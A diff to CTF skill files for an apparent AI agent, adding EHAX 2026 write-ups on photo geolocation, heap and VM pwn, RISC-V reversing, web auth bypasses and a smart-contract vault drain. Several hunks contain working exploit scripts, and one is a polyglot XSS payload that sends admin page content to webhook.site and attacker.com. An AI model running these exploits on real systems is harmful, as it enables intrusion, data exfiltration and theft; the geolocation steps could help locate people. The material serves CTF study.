+**Pattern (date_spot):** Street view image of a coastal location. Identify exact coordinates from road infrastructure.
+
+**Systematic approach:**
+1. **Driving side:** Left-hand traffic → right-hand drive countries (Japan, UK, Australia, etc.)
+2. **Sign language/script:** Kanji → Japan; Cyrillic → Russia/CIS; Arabic → Middle East/North Africa
+3. **Road sign style:** Blue directional signs with white text and route numbers → Japanese expressways
+4. **Sign OCR:** Extract text from directional signs to identify town/city names and route designations
+5. **Route tracing:** Search identified route number + town names to find the road corridor
+6. **Terrain matching:** Match coastline, harbors, lighthouses, bridges against satellite view
+
+**Japanese infrastructure clues:**
+- Blue highway signs with white Kanji + route numbers (e.g., E59)
+- Distinctive guardrail style (galvanized steel, wavy profile)
+- Concrete seawalls on coastal roads
+- Small fishing harbors with white lighthouse structures
+
+**General country identification shortcuts:**
+| Feature | Country/Region |
+|---------|---------------|
+| Kanji + blue highway signs | Japan |
+| Cyrillic + wide boulevards | Russia/CIS |
+| White X-shape crossing signs | Canada |
+| Yellow diamond warning signs | USA/Canada |
+| Green autobahn signs | Germany |
+| Brown tourist signs | France |
+| Bollards with red reflectors | Netherlands |
+
+---
+
+## Post-Soviet Architecture and Brand Identification (EHAX 2026)
+
+**Pattern (idinahui):** Coastal parking lot image. Identify location from architectural style, vehicle types, signage, and local brands.
+
+**Recognition chain:**
+1. **Architecture:** Brutalist concrete buildings → post-Soviet region
+2. **Vehicles:** Reverse image search vehicle models to narrow to Russian/CIS market cars
+3. **Script:** Cyrillic signage confirms Russian-language region
+4. **Flags:** Regional government flags alongside national tricolor → identify specific federal subject
+5. **Brands:** Named restaurants/chains (e.g., "Mimino" — Georgian-themed chain popular across Russia) → search for geographic distribution
+6. **Coastal features:** Caspian Sea coastline + North Caucasus architecture → Dagestan/Makhachkala
+
+**Key technique — restaurant/brand geolocation:**
+- Identify any readable business name or brand logo
+- Search for that business + "locations" or "branches"
+- Cross-reference with other visual clues (coastline, terrain) to pinpoint exact branch
+- Google Maps business search is highly effective for named establishments
+
+**Post-Soviet visual markers:**
+- Panel apartment blocks (khrushchyovka/brezhnevka)
+- Wide boulevards with central medians
+- Concrete bus stops
+- Distinctive utility pole designs
+- Soviet-era monuments and mosaics
 
 ---
 

--- a/ctf-pwn/SKILL.md
+++ b/ctf-pwn/SKILL.md
@@ -1,6 +1,6 @@
 ---
 name: ctf-pwn
-description: Binary exploitation (pwn) techniques for CTF challenges. Use when exploiting buffer overflows, format strings, heap vulnerabilities, race conditions, kernel bugs, ROP chains, ret2libc, shellcode, GOT overwrite, use-after-free, seccomp bypass, or sandbox escape.
+description: Binary exploitation (pwn) techniques for CTF challenges. Use when exploiting buffer overflows, format strings, heap vulnerabilities, race conditions, kernel bugs, ROP chains, ret2libc, shellcode, GOT overwrite, use-after-free, seccomp bypass, FSOP, stack pivot, or sandbox escape.
 license: MIT
 compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation.
 allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch

--- a/ctf-pwn/SKILL.md
+++ b/ctf-pwn/SKILL.md
@@ -104,7 +104,7 @@ Leak libc via `puts@PLT(puts@GOT)`, return to vuln, stage 2 with `system("/bin/s
 
 ## Seccomp Bypass
 
-Alternative syscalls when seccomp blocks `open()`/`read()`: `openat()` (257), `openat2()` (437, often missed!), `sendfile()` (40), `readv()`/`writev()`.
+Alternative syscalls when seccomp blocks `open()`/`read()`: `openat()` (257), `openat2()` (437, often missed!), `sendfile()` (40), `readv()`/`writev()`, `mmap()` (9, map flag file into memory instead of read), `pread64()` (17).
 
 **Check rules:** `seccomp-tools dump ./binary`
 
@@ -149,7 +149,7 @@ See [format-string.md](format-string.md) for GOT overwrite patterns, blind pwn, 
 - Freed chunks contain libc pointers (fd/bk) -> leak via error messages or missing null-termination
 - Heap feng shui: control alloc order/sizes, create holes, place targets adjacent to overflow source
 
-See [advanced.md](advanced.md) for House of Apple 2 FSOP chain, custom allocator exploitation (nginx pools), heap overlap via base conversion, tree data structure stack underallocation.
+See [advanced.md](advanced.md) for House of Apple 2 FSOP chain, custom allocator exploitation (nginx pools), heap overlap via base conversion, tree data structure stack underallocation, FSOP + seccomp bypass via openat/mmap/write with `mov rsp, rdx` stack pivot.
 
 ## JIT Compilation Exploits
 

--- a/ctf-pwn/SKILL.md
+++ b/ctf-pwn/SKILL.md
@@ -197,6 +197,10 @@ See [advanced.md](advanced.md) for House of Apple 2 FSOP chain, custom allocator
 
 AST bypass via f-strings, audit hook bypass with `b'flag.txt'` (bytes vs str), MRO-based `__builtins__` recovery. See [sandbox-escape.md](sandbox-escape.md).
 
+## VM GC-Triggered UAF (Slab Reuse)
+
+**Pattern:** Custom VM with NEWBUF/SLICE/GC opcodes. Slicing creates shared slab reference; dropping+GC'ing slice frees slab while parent still holds it. Allocate function object to reuse slab, leak code pointer via UAF read, overwrite with win() address. See [advanced.md](advanced.md).
+
 ## VM Exploitation (Custom Bytecode)
 
 **Pattern:** Custom VM with OOB read/write in syscalls. Leak PIE via XOR-encoded function pointer, overflow to rewrite pointer with `win() ^ KEY`. See [sandbox-escape.md](sandbox-escape.md).

--- a/ctf-pwn/advanced.md
+++ b/ctf-pwn/advanced.md
@@ -30,6 +30,7 @@
 - [Global Buffer Overflow (CSV Injection)](#global-buffer-overflow-csv-injection)
 - [MD5 Preimage Gadget Construction](#md5-preimage-gadget-construction)
 - [Path Traversal Sanitizer Bypass](#path-traversal-sanitizer-bypass)
+- [FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)](#fsop--seccomp-bypass-via-openatmmapwrite-ehax-2026)
 - [Kernel Exploitation](#kernel-exploitation)
 
 ---
@@ -606,6 +607,87 @@ for (uint64_t ctr = 0; ; ctr++) {
 **Flag via `/proc/self/fd/N`:**
 - If binary opens flag file but doesn't close fd, read via `/proc/self/fd/3`
 - fd 0=stdin, 1=stdout, 2=stderr, 3=first opened file
+
+## FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)
+
+**Pattern (The Revenge of Womp Womp):** Heap exploit (UAF) leading to FSOP chain, but seccomp blocks standard `open`/`read`/`write` or `execve`. Use alternative syscalls to read the flag.
+
+**Exploit chain:**
+1. **Leak libc** via `show()` on freed unsorted bin chunk (fd/bk pointers)
+2. **UAF → unsafe unlink** to redirect pointer to `.bss` region
+3. **Craft fake FILE** structure on heap with vtable pointing to `_IO_wfile_jumps`
+4. **FSOP chain:** `_IO_wfile_overflow` → `_IO_wdoallocbuf` → `_IO_WDOALLOCATE(fp)`
+5. **Stack pivot** via `mov rsp, rdx` gadget (rdx controllable from FILE struct)
+6. **ROP chain** using seccomp-compatible syscalls
+
+**Seccomp bypass with openat/mmap/write:**
+```python
+# When seccomp blocks open() and read(), use:
+# openat(AT_FDCWD, "/flag", O_RDONLY)  - syscall 257
+# mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0)  - syscall 9
+# write(STDOUT, mapped_addr, 4096)  - syscall 1
+
+from pwn import *
+
+rop = ROP(libc)
+# openat(AT_FDCWD=-100, "/flag", O_RDONLY=0)
+rop.raw(pop_rdi)
+rop.raw(-100 & 0xffffffffffffffff)  # AT_FDCWD
+rop.raw(pop_rsi)
+rop.raw(flag_str_addr)               # pointer to "/flag\x00"
+rop.raw(pop_rdx_rbx)
+rop.raw(0)                            # O_RDONLY
+rop.raw(0)
+rop.raw(libc.sym.openat)
+
+# mmap(NULL, 4096, PROT_READ=1, MAP_PRIVATE=2, fd=3, 0)
+rop.raw(pop_rdi)
+rop.raw(0)                            # addr = NULL
+rop.raw(pop_rsi)
+rop.raw(0x1000)                       # length
+rop.raw(pop_rdx_rbx)
+rop.raw(1)                            # PROT_READ
+rop.raw(0)
+# r10 = MAP_PRIVATE (2), r8 = fd (3) - need gadgets for these
+rop.raw(libc.sym.mmap)
+
+# write(1, mapped_addr, 4096)
+rop.raw(pop_rdi)
+rop.raw(1)                            # stdout
+rop.raw(pop_rsi)
+rop.raw(mapped_addr)                  # mmap return value
+rop.raw(pop_rdx_rbx)
+rop.raw(0x1000)
+rop.raw(0)
+rop.raw(libc.sym.write)
+```
+
+**`mov rsp, rdx` stack pivot gadget:**
+```python
+# Common in libc — search with:
+# ROPgadget --binary libc.so.6 | grep "mov rsp, rdx"
+# or: one_gadget libc.so.6 (sometimes lists pivot gadgets)
+
+# In FSOP context: rdx is controllable via _IO_wide_data fields
+# Set _wide_data->_IO_buf_base to point to your ROP chain
+# When _IO_WDOALLOCATE is called, rdx = _wide_data->_IO_buf_base
+# Pivot: mov rsp, rdx → ROP chain runs
+```
+
+**Key insight:** "Stale size tracking" = the menu tracks object sizes but doesn't invalidate after free. This enables UAF because `show()`/`edit()` still use the old size to access freed memory. Always check if delete nullifies the size field in addition to the pointer.
+
+**Seccomp alternative syscall quick reference:**
+| Blocked | Alternative | Syscall # |
+|---------|------------|-----------|
+| `open` | `openat` | 257 |
+| `open` | `openat2` | 437 |
+| `read` | `mmap` + access | 9 |
+| `read` | `pread64` | 17 |
+| `read` | `readv` | 19 |
+| `write` | `writev` | 20 |
+| `write` | `sendfile` | 40 |
+
+---
 
 ## Kernel Exploitation
 

--- a/ctf-pwn/advanced.md
+++ b/ctf-pwn/advanced.md
@@ -29,6 +29,7 @@
 - [Canary-Aware Partial Overflow](#canary-aware-partial-overflow)
 - [Global Buffer Overflow (CSV Injection)](#global-buffer-overflow-csv-injection)
 - [MD5 Preimage Gadget Construction](#md5-preimage-gadget-construction)
+- [VM GC-Triggered UAF — Slab Reuse (EHAX 2026)](#vm-gc-triggered-uaf-slab-reuse-ehax-2026)
 - [Path Traversal Sanitizer Bypass](#path-traversal-sanitizer-bypass)
 - [FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)](#fsop--seccomp-bypass-via-openatmmapwrite-ehax-2026)
 - [Kernel Exploitation](#kernel-exploitation)
@@ -592,6 +593,74 @@ for (uint64_t ctr = 0; ; ctr++) {
 **Pre-computation approach:** Build lookup table mapping MD5 4-byte prefixes to inputs. At runtime, parse win() address from server banner, look up matching push-hash input.
 
 **Brute-force time:** 32-bit prefix match: ~2^32 hashes (~60s on 8 cores). 16-bit: instant.
+
+## VM GC-Triggered UAF — Slab Reuse (EHAX 2026)
+
+**Pattern (SarcAsm):** Custom stack-based VM with NEWBUF/SLICE/GC/BUILTIN opcodes. Slicing a buffer creates a shared reference to the same slab. When the slice is dropped and GC'd, it frees the shared slab even though the parent buffer is still alive.
+
+**Vulnerability:** `free_data()` called on slice frees the underlying slab pointer that the parent buffer still references → UAF read/write through parent.
+
+**Exploit chain:**
+1. `NEWBUF 24` → allocates 32-byte slab (slab class matches function objects)
+2. `READ 24` → fills buffer, sets length so SLICE bounds check passes
+3. `SLICE 0,24` → alias to same slab
+4. `DROP` + `GC` → frees the slab via slice's destructor
+5. `BUILTIN 0` → allocates function object, reuses freed 32-byte slab (code pointer at offset +8)
+6. `WRITEBUF 16,0` → sets parent buffer's length to 16 (no actual write, bypasses bounds)
+7. `PRINTB` → leaks code pointer from UAF slab → compute PIE base
+8. `READ 16` → overwrites code pointer with `win()` address
+9. `CALL` → executes `win()` → `execve("/bin/sh")`
+
+```python
+from pwn import *
+import struct
+
+# ULEB128 encoding for VM immediates
+def uleb128(val):
+    result = b''
+    while True:
+        byte = val & 0x7f
+        val >>= 7
+        if val: byte |= 0x80
+        result += bytes([byte])
+        if not val: break
+    return result
+
+# Opcodes
+NEWBUF, READ, SLICE, DROP, GC = b'\x20', b'\x21', b'\x22', b'\x04', b'\x60'
+BUILTIN, CALL, GLOAD, GSTORE = b'\x40', b'\x41', b'\x30', b'\x31'
+WRITEBUF, PRINTB, PUSH, HALT = b'\x25', b'\x23', b'\x01', b'\xff'
+
+code = b''
+code += NEWBUF + uleb128(24) + GSTORE + uleb128(0)  # buf A in slot 0
+code += GLOAD + uleb128(0) + READ + uleb128(24)      # fill to set length
+code += GLOAD + uleb128(0) + SLICE + uleb128(0) + uleb128(24)  # slice
+code += DROP + GC                                      # free slab via slice
+code += BUILTIN + uleb128(0) + GSTORE + uleb128(1)   # func F reuses slab
+code += GLOAD + uleb128(0) + WRITEBUF + uleb128(16) + uleb128(0)  # set len=16
+code += GLOAD + uleb128(0) + PRINTB                    # leak code ptr
+code += GLOAD + uleb128(0) + READ + uleb128(16)       # overwrite code ptr
+code += PUSH + b'\x00' + GLOAD + uleb128(1) + CALL + uleb128(1)  # call win
+code += HALT
+
+blob = struct.pack('<I', len(code)) + code
+p = remote('target', 9999)
+p.send(blob + b'A'*24)          # blob + dummy READ data
+leak = p.recv(16, timeout=5)
+code_ptr = struct.unpack('<Q', leak[:8])[0]
+win_addr = (code_ptr - 0x31d0) + 0x3000  # PIE base + win offset
+p.send(struct.pack('<Q', win_addr) + b'\x00'*8)
+p.sendline(b'cat /flag*')
+p.interactive()
+```
+
+**Key lessons:**
+- **Slab allocator reuse:** Function objects and buffer data share the same slab size class → guaranteed UAF overlap
+- **WRITEBUF length trick:** Setting length without writing data bypasses bounds checks but exposes UAF content
+- **GC as trigger:** Explicit `GC` opcode forces immediate collection → deterministic UAF timing
+- **General pattern:** In custom VMs, look for shared references (slices, views, aliases) where destruction of one frees resources still held by another
+
+---
 
 ## Path Traversal Sanitizer Bypass
 

--- a/ctf-reverse/SKILL.md
+++ b/ctf-reverse/SKILL.md
@@ -14,8 +14,8 @@ Quick reference for RE challenges. For detailed techniques, see supporting files
 
 ## Additional Resources
 
-- [tools.md](tools.md) - Tool-specific commands (GDB, Ghidra, radare2, IDA)
-- [patterns.md](patterns.md) - Core binary patterns: custom VMs, anti-debugging, nanomites, self-modifying code, XOR ciphers, mixed-mode stagers, LLVM obfuscation, S-box/keystream, SECCOMP/BPF, exception handlers, memory dumps, byte-wise transforms, x86-64 gotchas, hidden emulator opcodes, LD_PRELOAD key extraction, SPN static extraction, image XOR smoothness, byte-at-a-time cipher
+- [tools.md](tools.md) - Tool-specific commands (GDB, Ghidra, radare2, IDA, RISC-V with Capstone)
+- [patterns.md](patterns.md) - Core binary patterns: custom VMs, anti-debugging, nanomites, self-modifying code, XOR ciphers, mixed-mode stagers, LLVM obfuscation, S-box/keystream, SECCOMP/BPF, exception handlers, memory dumps, byte-wise transforms, x86-64 gotchas, hidden emulator opcodes, LD_PRELOAD key extraction, SPN static extraction, image XOR smoothness, byte-at-a-time cipher, mathematical convergence bitmap
 - [languages.md](languages.md) - Language/platform-specific: Python bytecode & opcode remapping, Python version-specific bytecode, DOS stubs, Unity IL2CPP, Brainfuck/esolangs, UEFI, transpilation to C, code coverage side-channel, OPAL functional reversing, non-bijective substitution
 
 ---
@@ -302,3 +302,11 @@ Binary mmaps `.rodata` blob, XOR-deobfuscates, uses it to validate input. Reimpl
 ## Prefix Hash Brute-Force
 
 Binary hashes every prefix independently. Recover one character at a time by matching prefix hashes. See [patterns.md](patterns.md#prefix-hash-brute-force-nullcon-2026).
+
+## Mathematical Convergence Bitmap
+
+**Pattern:** Binary classifies coordinate pairs by Newton's method convergence (e.g., z^3-1=0). Grid of pass/fail results renders ASCII art flag. Key: the binary is a classifier, not a checker — reverse the math and visualize. See [patterns.md](patterns.md#mathematical-convergence-bitmap-ehax-2026).
+
+## RISC-V Binary Analysis
+
+Statically linked, stripped RISC-V ELF. Use Capstone with `CS_MODE_RISCVC | CS_MODE_RISCV64` for mixed compressed instructions. Emulate with `qemu-riscv64`. Watch for fake flags and XOR decryption with incremental keys. See [tools.md](tools.md#risc-v-binary-analysis-ehax-2026).

--- a/ctf-reverse/patterns.md
+++ b/ctf-reverse/patterns.md
@@ -40,6 +40,7 @@
 - [Shellcode in Data Section via mmap RWX (VuwCTF 2025)](#shellcode-in-data-section-via-mmap-rwx-vuwctf-2025)
 - [Recursive execve Subtraction (VuwCTF 2025)](#recursive-execve-subtraction-vuwctf-2025)
 - [Byte-at-a-Time Block Cipher Attack (UTCTF 2024)](#byte-at-a-time-block-cipher-attack-utctf-2024)
+- [Mathematical Convergence Bitmap (EHAX 2026)](#mathematical-convergence-bitmap-ehax-2026)
 - [Byte-Wise Uniform Transforms](#byte-wise-uniform-transforms)
 - [x86-64 Gotchas](#x86-64-gotchas)
   - [Sign Extension](#sign-extension)
@@ -485,6 +486,49 @@ for region in regions:
 **Attack:** For each position, try all 256 byte values, compare output byte with target ciphertext. One match per byte = full plaintext recovery without knowing the key.
 
 **Detection:** Change one input byte → only corresponding output byte changes. This means zero cross-byte diffusion = trivially breakable.
+
+---
+
+## Mathematical Convergence Bitmap (EHAX 2026)
+
+**Pattern (Compute It):** Binary classifies complex-plane coordinates by Newton's method convergence. The classification results, arranged as a grid, spell out the flag in ASCII art.
+
+**Recognition:**
+- Input file with coordinate pairs (x, y)
+- Binary iterates a mathematical function (e.g., z^3 - 1 = 0) and outputs pass/fail
+- Grid dimensions hinted by point count (e.g., 2600 = 130×20)
+- 5-pixel-high ASCII art font common in CTFs
+
+**Newton's method for z^3 - 1:**
+```python
+def newton_converges_to_one(px, py, max_iter=50, target_count=12):
+    """Returns True if Newton's method converges to z=1 in exactly target_count steps."""
+    x, y = px, py
+    count = 0
+    for _ in range(max_iter):
+        f_real = x**3 - 3*x*y**2 - 1.0
+        f_imag = 3*x**2*y - y**3
+        J_rr = 3.0 * (x**2 - y**2)
+        J_ri = 6.0 * x * y
+        det = J_rr**2 + J_ri**2
+        if det < 1e-9:
+            break
+        x -= (f_real * J_rr + f_imag * J_ri) / det
+        y -= (f_imag * J_rr - f_real * J_ri) / det
+        count += 1
+        if abs(x - 1.0) < 1e-6 and abs(y) < 1e-6:
+            break
+    return count == target_count
+
+# Read coordinates and render bitmap
+points = [(float(x), float(y)) for x, y in ...]
+bits = [1 if newton_converges_to_one(px, py) else 0 for px, py in points]
+WIDTH = 130  # 2600 / 20 rows
+for r in range(len(bits) // WIDTH):
+    print(''.join('#' if bits[r*WIDTH+c] else '.' for c in range(WIDTH)))
+```
+
+**Key insight:** The binary is a mathematical classifier, not a flag checker. The flag is in the visual pattern of classifications, not in the binary's output. Reverse-engineer the math, apply to all coordinates, and visualize as bitmap.
 
 ---
 

--- a/ctf-reverse/tools.md
+++ b/ctf-reverse/tools.md
@@ -37,6 +37,7 @@
   - [PyInstaller](#pyinstaller)
 - [LLVM IR](#llvm-ir)
   - [Convert to Assembly](#convert-to-assembly)
+- [RISC-V Binary Analysis (EHAX 2026)](#risc-v-binary-analysis-ehax-2026)
 - [Useful Commands](#useful-commands)
 
 ---
@@ -326,6 +327,51 @@ python pyinstxtractor.py binary.exe
 llc task.ll --x86-asm-syntax=intel
 gcc -c task.s -o file.o
 ```
+
+---
+
+## RISC-V Binary Analysis (EHAX 2026)
+
+**Pattern (iguessbro):** Statically linked, stripped RISC-V ELF binary. Can't run natively on x86.
+
+**Disassembly with Capstone:**
+```python
+from capstone import *
+
+with open('binary', 'rb') as f:
+    code = f.read()
+
+# RISC-V 64-bit with compressed instruction support
+md = Cs(CS_ARCH_RISCV, CS_MODE_RISCVC | CS_MODE_RISCV64)
+md.detail = True
+
+# Disassemble from entry point (check ELF header for e_entry)
+TEXT_OFFSET = 0x10000  # typical for static RISC-V
+for insn in md.disasm(code[TEXT_OFFSET:], TEXT_OFFSET):
+    print(f"0x{insn.address:x}:\t{insn.mnemonic}\t{insn.op_str}")
+```
+
+**Common RISC-V patterns:**
+- `li a0, N` → load immediate (argument setup)
+- `mv a0, s0` → register move
+- `call offset` → function call (auipc + jalr pair)
+- `beq/bne a0, zero, label` → conditional branch
+- `sd/ld` → 64-bit store/load
+- `addiw` → 32-bit add (W-suffix = word operations)
+
+**Key differences from x86:**
+- No flags register — comparisons are inline with branch instructions
+- Arguments in a0-a7 (not rdi/rsi/rdx)
+- Return value in a0
+- Saved registers s0-s11 (callee-saved)
+- Compressed instructions (2 bytes) mixed with standard (4 bytes) — use `CS_MODE_RISCVC`
+
+**Anti-RE tricks in RISC-V:**
+- Fake flags as string constants (check for `"n0t_th3_r34l"` patterns)
+- Timing anti-brute-force (rdtime instruction)
+- XOR decryption with incremental key: `decrypted[i] = enc[i] ^ (key & 0xFF) ^ 0xA5; key += 7`
+
+**Emulation:** `qemu-riscv64 -L /usr/riscv64-linux-gnu/ ./binary` (needs cross-toolchain sysroot)
 
 ---
 

--- a/ctf-web/SKILL.md
+++ b/ctf-web/SKILL.md
@@ -152,8 +152,9 @@ See [node-and-prototype.md](node-and-prototype.md) for detailed exploitation.
 ## Auth & Access Control Quick Reference
 
 - Cookie manipulation: `role=admin`, `isAdmin=true`
+- Public admin-login cookie seeding: check if `/admin/login` sets reusable admin session cookie
 - Host header bypass: `Host: 127.0.0.1`
-- Hidden endpoints: search JS bundles for `/api/internal/`, `/api/admin/`
+- Hidden endpoints: search JS bundles for `/api/internal/`, `/api/admin/`; fuzz with auth cookie for non-`/api` routes like `/internal/*`
 - Client-side gates: `window.overrideAccess = true` or call API directly
 - Password inference: profile data + structured ID format → brute-force
 - Weak signature: check if only first N chars of hash are validated

--- a/ctf-web/auth-and-access.md
+++ b/ctf-web/auth-and-access.md
@@ -12,10 +12,12 @@
 - [NoSQL Injection (MongoDB)](#nosql-injection-mongodb)
   - [Blind NoSQL with Binary Search](#blind-nosql-with-binary-search)
 - [Cookie Manipulation](#cookie-manipulation)
+- [Public Admin Login Route Cookie Seeding (EHAX 2026)](#public-admin-login-route-cookie-seeding-ehax-2026)
 - [Host Header Bypass](#host-header-bypass)
 - [Broken Auth: Always-True Hash Check (0xFun 2026)](#broken-auth-always-true-hash-check-0xfun-2026)
 - [/proc/self/mem via HTTP Range Requests (UTCTF 2024)](#procselfmem-via-http-range-requests-utctf-2024)
 - [Hidden API Endpoints](#hidden-api-endpoints)
+- [HAProxy ACL Regex Bypass via URL Encoding (EHAX 2026)](#haproxy-acl-regex-bypass-via-url-encoding-ehax-2026)
 
 ---
 
@@ -117,6 +119,31 @@ curl -H "Cookie: role=admin"
 curl -H "Cookie: isAdmin=true"
 ```
 
+## Public Admin Login Route Cookie Seeding (EHAX 2026)
+
+**Pattern (Metadata Mayhem):** Public endpoint like `/admin/login` sets a privileged cookie directly (for example `session=adminsession`) without credential checks.
+
+**Attack flow:**
+1. Request public admin-login route and inspect `Set-Cookie` headers
+2. Replay issued cookie against protected routes (`/admin`, admin APIs)
+3. Perform authenticated fuzzing with that cookie to find hidden internal routes (for example `/internal/flag`)
+
+```bash
+# Step 1: capture cookies from public admin-login route
+curl -i -c jar.txt http://target/admin/login
+
+# Step 2: use seeded session cookie on admin endpoints
+curl -b jar.txt http://target/admin
+
+# Step 3: authenticated endpoint discovery
+ffuf -u http://target/FUZZ -w words.txt -H 'Cookie: session=adminsession' -fc 404
+```
+
+**Detection tips:**
+- `GET /admin/login` returns `302` and sets a static-looking session cookie
+- Protected routes fail unauthenticated (`403`) but succeed with replayed cookie
+- Hidden admin routes may live outside `/api` (for example `/internal/*`)
+
 ## Host Header Bypass
 ```http
 GET /flag HTTP/1.1
@@ -191,3 +218,29 @@ target_sig = build_signature(secrets, b"flag")
 
 ## Hidden API Endpoints
 Search JS bundles for `/api/internal/`, `/api/admin/`, undocumented endpoints.
+
+Also fuzz with authenticated cookies/tokens, not just anonymous requests. Admin-only routes are often hidden and may be outside `/api` (for example `/internal/flag`).
+
+---
+
+## HAProxy ACL Regex Bypass via URL Encoding (EHAX 2026)
+
+**Pattern (Borderline Personality):** HAProxy blocks `^/+admin` regex pattern, Flask backend serves `/admin/flag`.
+
+**Bypass:** URL-encode the first character of the blocked path segment:
+```bash
+# HAProxy ACL: path_reg ^/+admin → blocks /admin, //admin, etc.
+# Bypass: /%61dmin/flag → HAProxy sees %61 (not 'a'), regex doesn't match
+# Flask decodes %61 → 'a' → routes to /admin/flag
+
+curl 'http://target/%61dmin/flag'
+```
+
+**Variants:**
+- `/%41dmin` (uppercase A encoding)
+- `/%2561dmin` (double-encode if proxy decodes once)
+- Encode any character in the blocked prefix: `/a%64min`, `/ad%6din`
+
+**Key insight:** HAProxy ACL regex operates on raw URL bytes (before decode). Flask/Express/most backends decode percent-encoding before routing. This decode mismatch is the vulnerability.
+
+**Detection:** HAProxy config with `acl` + `path_reg` or `path_beg` rules. Check if backend framework auto-decodes URLs.

--- a/ctf-web/client-side.md
+++ b/ctf-web/client-side.md
@@ -18,6 +18,7 @@
 - [DOM Clobbering + MIME Mismatch](#dom-clobbering-mime-mismatch)
 - [HTTP Request Smuggling via Cache Proxy](#http-request-smuggling-via-cache-proxy)
 - [CSS/JS Paywall Bypass](#cssjs-paywall-bypass)
+- [JPEG+HTML Polyglot XSS (EHAX 2026)](#jpeghtml-polyglot-xss-ehax-2026)
 - [JSFuck Decoding](#jsfuck-decoding)
 
 ---
@@ -224,6 +225,63 @@ curl -s https://target/article | grep -i "flag\|CTF{"
 **Key insight:** Many paywalls are client-side DOM overlays — the content is always in the HTML. The leetspeak hint "paywalls are just DOM" confirms this. Always try `curl` or view-source first before more complex approaches.
 
 **Detection:** Look for `<div>` elements with `position: fixed`, high `z-index`, and `backdrop-filter: blur()` in the page source — these are overlay-based paywalls.
+
+---
+
+## JPEG+HTML Polyglot XSS (EHAX 2026)
+
+**Pattern (Metadata Meyham):** File upload accepts JPEG, serves uploaded files with permissive MIME type. Admin bot visits reported files.
+
+**Attack:** Create a JPEG+HTML polyglot — valid JPEG header followed by HTML/JS payload:
+```python
+from PIL import Image
+import io
+
+# Create minimal valid JPEG
+img = Image.new('RGB', (1,1), color='red')
+buf = io.BytesIO()
+img.save(buf, 'JPEG', quality=1)
+jpeg_data = buf.getvalue()
+
+# HTML payload appended after JPEG data
+html_payload = '''<!DOCTYPE html>
+<html><body><script>
+(async function(){
+  // Fetch admin page content
+  var r = await fetch("/admin");
+  var t = await r.text();
+  // Exfiltrate via self-upload (stays on same origin)
+  var j = new Uint8Array([255,216,255,224,0,16,74,70,73,70,0,1,1,0,0,1,0,1,0,0,255,217]);
+  var b = new Blob([j], {type:'image/jpeg'});
+  var f = new FormData();
+  f.append('file', b, 'FLAG_' + btoa(t).substring(0,100) + '.jpg');
+  await fetch('/upload', {method:'POST', body:f});
+  // Also try external webhook
+  new Image().src = "https://webhook.site/YOUR_ID?d=" + encodeURIComponent(t.substring(0,500));
+})();
+</script></body></html>'''
+
+polyglot = jpeg_data + b'\n' + html_payload.encode()
+# Upload as .html with image/jpeg content type
+```
+
+**PoW bypass:** Many CTF report endpoints require SHA-256 proof-of-work:
+```python
+import hashlib
+nonce = 0
+while True:
+    h = hashlib.sha256((challenge + str(nonce)).encode()).hexdigest()
+    if h.startswith('0' * difficulty):
+        break
+    nonce += 1
+```
+
+**Exfiltration methods (ranked by reliability):**
+1. **Self-upload:** Fetch `/admin`, upload result as filename → check `/files` for new uploads
+2. **Webhook:** `fetch('https://webhook.site/ID?flag='+data)` — may be blocked by CSP
+3. **DNS exfil:** `new Image().src = 'http://'+btoa(flag)+'.attacker.com'` — bypasses most CSP
+
+**Key insight:** JPEG files are tolerant of trailing data. Browsers parse HTML from anywhere in the response when MIME allows it. The polyglot is simultaneously a valid JPEG and valid HTML.
 
 ---
 

--- a/ctf-web/web3.md
+++ b/ctf-web/web3.md
@@ -8,6 +8,7 @@
 - [Non-Standard ABI Calldata Encoding](#non-standard-abi-calldata-encoding)
 - [Solidity bytes32 String Encoding](#solidity-bytes32-string-encoding)
 - [Complete Exploit Flow (House of Illusions)](#complete-exploit-flow-house-of-illusions)
+- [Delegatecall Storage Context Abuse (EHAX 2026)](#delegatecall-storage-context-abuse-ehax-2026)
 - [Web3 CTF Tips](#web3-ctf-tips)
 
 ---
@@ -121,6 +122,54 @@ cast send $PROXY $CRAFTED_CALLDATA --private-key $KEY --rpc-url $RPC
 cast send $PROXY "appointCurator(address)" $MY_ADDR --private-key $KEY --rpc-url $RPC
 cast call $FACTORY "isSolved(address)(bool)" $MY_ADDR --rpc-url $RPC
 ```
+
+---
+
+## Delegatecall Storage Context Abuse (EHAX 2026)
+
+**Pattern (Heist v1):** Vault contract with `execute()` that does `delegatecall` to a governance contract. `setGovernance()` has **no access control**.
+
+**Storage layout awareness:** `delegatecall` runs callee code in caller's storage context. If vault has:
+- Slot 0: `paused` (bool) + `fee` (uint248) — packed
+- Slot 1: `admin` (address)
+- Slot 2: `governance` (address)
+
+Writing to slot 0/1 in the delegated contract modifies the vault's `paused` and `admin`.
+
+**Attack chain:**
+1. Deploy attacker contract matching vault's storage layout
+2. `setGovernance(attacker_address)` — no access control
+3. `execute(abi.encodeWithSignature("attack(address)", player))` — delegatecall
+4. Attacker's `attack()` writes `paused=false` to slot 0, `admin=player` to slot 1
+5. `withdraw()` — now authorized as admin with vault unpaused
+
+```solidity
+contract Attacker {
+    bool public paused;      // slot 0 (match vault layout)
+    uint248 public fee;      // slot 0
+    address public admin;    // slot 1
+    address public governance; // slot 2
+
+    function attack(address _newAdmin) public {
+        paused = false;
+        admin = _newAdmin;
+    }
+}
+```
+
+```bash
+# Deploy attacker
+forge create Attacker.sol:Attacker --rpc-url $RPC --private-key $KEY
+# Hijack governance
+cast send $VAULT "setGovernance(address)" $ATTACKER --rpc-url $RPC --private-key $KEY
+# Execute delegatecall
+CALLDATA=$(cast calldata "attack(address)" $PLAYER)
+cast send $VAULT "execute(bytes)" $CALLDATA --rpc-url $RPC --private-key $KEY
+# Drain
+cast send $VAULT "withdraw()" --rpc-url $RPC --private-key $KEY
+```
+
+**Key insight:** Always check if `setGovernance()` / `setImplementation()` / upgrade functions have access control. Unprotected governance setters + delegatecall = full storage control.
 
 ---
 

--- a/solve-challenge/SKILL.md
+++ b/solve-challenge/SKILL.md
@@ -39,10 +39,10 @@ Determine the primary category, then invoke the matching skill.
 - "buffer overflow", "ROP", "shellcode", "libc", "heap" -> pwn
